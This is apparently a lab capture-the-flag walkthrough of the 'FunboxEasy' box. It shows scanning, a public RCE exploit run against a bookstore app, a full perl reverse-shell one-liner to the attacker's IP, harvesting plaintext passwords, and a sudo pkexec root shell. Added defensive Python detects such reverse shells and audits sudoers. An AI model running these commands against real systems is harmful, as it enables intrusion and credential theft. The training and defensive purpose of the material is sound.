# FunboxEasy

## Nmap

```
nmap 192.168.178.111 -p- -sS -sV

Host is up (0.097s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open  mysqlx?
```

Checking out port 80, we have the default install page for Apache 2.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c2f4cfe8165a34dc58fd4d1fd30ca6abaa18adef%2Fimage.png?alt=media)

Checking the source on this page reveals no interesting information. From here I executed dirsearch.py against the target machine.

```
sudo python3 dirsearch.py -u http://192.168.178.111/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --full-url -t 75 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d4212d20354a7875d7790fada5625e93f4ee9738%2Fimage.png?alt=media)

Checking the directory /store, we are presented with a web page for 'CSE bookstore'.

![/store](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-044b74e2097ad3542308606c2eed6f4b33707134%2Fimage.png?alt=media)

Researching exploits on Google for 'CSE bookstore' we are presented with an exploit for Unauthenticated RCE. The exploit PoC has been linked below.

{% embed url="https://www.exploit-db.com/exploits/47887" %}

After downloading the PoC I executed it with the following command:

```
python3 47887.py http://192.168.178.111/store/
```

When prompted to launch a shell hit 'y'.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3131b32f568d30fdbe4d5ed911135b7a65d3acb8%2Fimage.png?alt=media)

This shell stops us from properly navigating the target machine and returns us to the current working directory once each command has finished executing. As such, I checked which binaries are installed on the target machine so we can spawn a shell from which we can navigate the target properly.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0b038c25224a8e5cbbfe984a1bb3c4c50015da7f%2Fimage.png?alt=media)

As shown above, `perl` is installed on the system. From here I started a `netcat` listener on my attacking machine.

```
sudo nc -lvp 80
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-79d5c4c23f45c15f747f7f2cd7e84e90e98eea6a%2Fimage.png?alt=media)

I then executed the following command to gain a `perl` reverse shell.

```
perl -e 'use Socket;$i="192.168.49.178";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9f9fbda77862ffd962aaee4c28b37eb3ae6b3ebf%2Fimage.png?alt=media)
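From the defender's side, the one-liner above is a textbook process-creation signature: an interpreter started with inline code, raw socket setup, stdio redirected onto the socket, an interactive shell exec'd, and all of it as the web server's user. The following is an added example, not part of the original walkthrough, that scores process-creation events against those indicators. The `ProcessEvent` fields (user, parent process name, full command line), the indicator names, the web-server user/parent lists and the threshold are assumptions made for the example; the sample events are constructed, with the first one being the walkthrough's own perl command as it would be logged.

```python
import re
from dataclasses import dataclass, field

# Indicators drawn from the perl one-liner above: inline interpreter code, raw socket
# setup, stdio redirected onto the socket, and an interactive shell being exec'd.
INDICATORS = {
    "inline_interpreter": re.compile(r"\b(perl|python3?|ruby|php)\s+-[ec]\b"),
    "socket_api": re.compile(r"use Socket|socket\(|SOCK_STREAM|sockaddr_in|inet_aton"),
    "stdio_to_socket": re.compile(r'open\((STDIN|STDOUT|STDERR),\s*">&S"\)|\b[0-2]>&[0-9]'),
    "interactive_shell": re.compile(r'exec\("?(/bin/)?(sh|bash) -i|(^|\s|/)(sh|bash)\s+-i\b'),
}
# Assumed names for the web server account and parent processes (adjust per distro).
WEB_SERVER_USERS = {"www-data", "apache", "httpd"}
WEB_SERVER_PARENTS = {"apache2", "httpd", "nginx", "php-fpm"}


@dataclass
class ProcessEvent:
    user: str      # effective user of the new process
    parent: str    # parent process name
    cmdline: str   # full command line as logged


@dataclass
class Finding:
    event: ProcessEvent
    indicators: list = field(default_factory=list)
    score: int = 0


def analyze(event: ProcessEvent) -> Finding:
    """Score one process-creation event; each indicator counts 1, web-server origin counts 2."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event.cmdline)]
    score = len(hits)
    # An interpreter or shell spawned by the web server is the strongest single signal:
    # legitimate web apps rarely need it, and it is exactly how the PoC shell appears.
    if event.user in WEB_SERVER_USERS or event.parent in WEB_SERVER_PARENTS:
        hits.append("spawned_by_web_server")
        score += 2
    return Finding(event, hits, score)


def suspicious(events, threshold=3):
    """Return findings at or above the threshold; a lone 'bash -i' or '2>&1' stays below it."""
    return [f for f in map(analyze, events) if f.score >= threshold]


# Constructed sample events. The first is the walkthrough's perl one-liner as it would
# appear in a process-creation log after the bookstore PoC; the rest are benign noise.
SAMPLE_EVENTS = [
    ProcessEvent("www-data", "apache2",
                 "perl -e 'use Socket;$i=\"192.168.49.178\";$p=80;"
                 "socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));"
                 "if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");"
                 "open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"sh -i\");};'"),
    ProcessEvent("tony", "sshd", "bash -i"),
    ProcessEvent("root", "cron", "perl -e 'print 1+1'"),
    ProcessEvent("tony", "bash", "tar czf backup.tgz /home/tony 2>&1"),
]

if __name__ == "__main__":
    for f in suspicious(SAMPLE_EVENTS):
        print(f.score, f.event.user, f.event.parent, f.indicators)
```

The scoring is deliberately additive rather than a single regex, so a benign interactive `bash -i` over SSH or a `2>&1` in a cron job registers but does not alert on its own, while the web-server-spawned interpreter trips every indicator at once.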

Moving into /home and then into the user tony's home directory, we find passwords.txt. Reading the contents of this text file shows the following information:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c787f465db111b59e63d0681103ddffd0ceb4143%2Fimage.png?alt=media)

```
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin
```

I was then able to log in with the `SSH` password for the user tony.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e6c840bc18356d79f100d12387f750f5e1abb96e%2Fimage.png?alt=media)

Checking `sudo -l` for `sudo` permissions, we come across a multitude of entries.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-df4b3d43e59f79d1a9f19b6e636659425fc6c50e%2Fimage.png?alt=media)

As we can execute `sudo` as the user root without supplying a password here, I will use `pkexec` to spawn a bash shell as root.

```
sudo pkexec /bin/sh
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f31ee83f0821fa422879f2e4b2535430e58ebda5%2Fimage.png?alt=media)
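The root cause of this final step is a sudoers configuration, not a software bug: a long list of `NOPASSWD` entries that includes a binary able to hand over a shell. As an added example that is not part of the original walkthrough, the following audits sudoers-format user specifications (the source of what `sudo -l` prints) and ranks each allowed command. The `SHELL_CAPABLE` set is a constructed list for the example (with `pkexec`, the binary this box is escalated through, among it), the severity scheme is an assumption, and the sample sudoers text is constructed to mirror the box's pattern rather than copied from it.

```python
import re

# Targets that yield a root shell or arbitrary execution directly when run via sudo.
# Constructed for this example; /usr/bin/pkexec is the one the walkthrough used.
SHELL_CAPABLE = {"ALL", "/bin/sh", "/bin/bash", "/usr/bin/pkexec", "/bin/su", "/usr/bin/su"}

# user host=(runas) [TAG:] command, command ...   (host must not swallow the '=')
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<spec>.+)$"
)
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC|LOG_INPUT|LOG_OUTPUT):\s*")
NON_RULE_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_rule(line):
    """Parse one sudoers user specification; returns None for comments, Defaults and aliases."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(NON_RULE_PREFIXES):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    commands, nopasswd = [], False
    # Tags apply to the command they precede and to every following command until
    # another tag overrides them, so carry the NOPASSWD state across the comma list.
    for piece in m.group("spec").split(","):
        piece = piece.strip()
        while True:
            tag = TAG_RE.match(piece)
            if not tag:
                break
            if tag.group(1) == "NOPASSWD":
                nopasswd = True
            elif tag.group(1) == "PASSWD":
                nopasswd = False
            piece = piece[tag.end():]
        if piece:
            commands.append({"command": piece, "nopasswd": nopasswd})
    return {"who": m.group("who"), "host": m.group("host"),
            "runas": m.group("runas") or "root", "commands": commands}


def audit(sudoers_text):
    """Return (severity, who, runas, command) for every entry worth a second look."""
    findings = []
    for line in sudoers_text.splitlines():
        rule = parse_rule(line)
        if not rule:
            continue
        for cmd in rule["commands"]:
            binary = cmd["command"].split()[0]   # path only; arguments are ignored here
            if cmd["nopasswd"] and binary in SHELL_CAPABLE:
                sev = "high"      # root shell with no password: what this box allowed
            elif cmd["nopasswd"]:
                sev = "medium"    # still worth checking each binary for shell escapes
            elif binary in SHELL_CAPABLE:
                sev = "low"       # password required, but unrestricted once entered
            else:
                continue
            findings.append((sev, rule["who"], rule["runas"], cmd["command"]))
    return findings


# Constructed sample: a normal Ubuntu-style sudoers plus a user with many NOPASSWD entries.
SAMPLE_SUDOERS = """\
# constructed sample, not the box's real sudoers
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
tony    ALL=(ALL) NOPASSWD: /usr/bin/pkexec, /bin/ls, /usr/bin/id
tony    ALL=(ALL) PASSWD: /bin/ls
"""

if __name__ == "__main__":
    for sev, who, runas, command in audit(SAMPLE_SUDOERS):
        print(f"{sev:6} {who:8} ({runas}) {command}")
```

Running the audit on the sample flags `tony`'s `pkexec` entry as high, the other two `NOPASSWD` commands as medium, and the two password-protected `ALL` rules as low; the `PASSWD: /bin/ls` line produces nothing, since it is both password-gated and not shell-capable.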
